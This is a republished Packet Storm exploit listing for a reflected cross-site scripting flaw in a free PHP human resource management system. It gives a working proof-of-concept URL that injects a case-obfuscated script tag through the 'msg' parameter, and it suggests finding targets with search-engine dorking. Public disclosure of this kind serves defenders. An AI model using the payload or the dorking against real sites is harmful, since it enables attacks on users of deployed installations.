Security
Headlines
HeadlinesLatestCVEs

Headline

Human Resource Management System 2024 1.0 Cross Site Scripting

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox

Human Resource Management System 2024 1.0 Cross Site Scripting

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

Human Resource Management System 2024 1.0 Cross Site Scripting

=============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Tags

  • ActiveX (933)
  • Advisory (86,543)
  • Arbitrary (16,904)
  • BBS (2,859)
  • Bypass (1,875)
  • CGI (1,034)
  • Code Execution (7,834)
  • Conference (691)
  • Cracker (844)
  • CSRF (3,412)
  • DoS (25,116)
  • Encryption (2,389)
  • Exploit (53,289)
  • File Inclusion (4,263)
  • File Upload (1,000)
  • Firewall (822)
  • Info Disclosure (2,893)
  • Intrusion Detection (916)
  • Java (3,144)
  • JavaScript (899)
  • Kernel (7,239)
  • Local (14,807)
  • Magazine (587)
  • Overflow (13,177)
  • Perl (1,435)
  • PHP (5,226)
  • Proof of Concept (2,394)
  • Protocol (3,731)
  • Python (1,646)
  • Remote (31,695)
  • Root (3,639)
  • Rootkit (528)
  • Ruby (632)
  • Scanner (1,657)
  • Security Tool (8,031)
  • Shell (3,281)
  • Shellcode (1,217)
  • Sniffer (902)
  • Spoof (2,279)
  • SQL Injection (16,625)
  • TCP (2,444)
  • Trojan (690)
  • UDP (904)
  • Virus (670)
  • Vulnerability (33,016)
  • Web (9,973)
  • Whitepaper (3,782)
  • x86 (967)
  • XSS (18,267)
  • Other

File Archives

  • August 2024
  • July 2024
  • June 2024
  • May 2024
  • April 2024
  • March 2024
  • February 2024
  • January 2024
  • December 2023
  • November 2023
  • October 2023
  • September 2023
  • Older

Systems

  • AIX (429)
  • Apple (2,099)
  • BSD (377)
  • CentOS (58)
  • Cisco (1,927)
  • Debian (7,109)
  • Fedora (1,693)
  • FreeBSD (1,246)
  • Gentoo (4,567)
  • HPUX (880)
  • iOS (378)
  • iPhone (108)
  • IRIX (220)
  • Juniper (69)
  • Linux (50,895)
  • Mac OS X (691)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (489)
  • RedHat (16,615)
  • Slackware (941)
  • Solaris (1,611)
  • SUSE (1,444)
  • Ubuntu (9,780)
  • UNIX (9,441)
  • UnixWare (187)
  • Windows (6,676)
  • Other

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution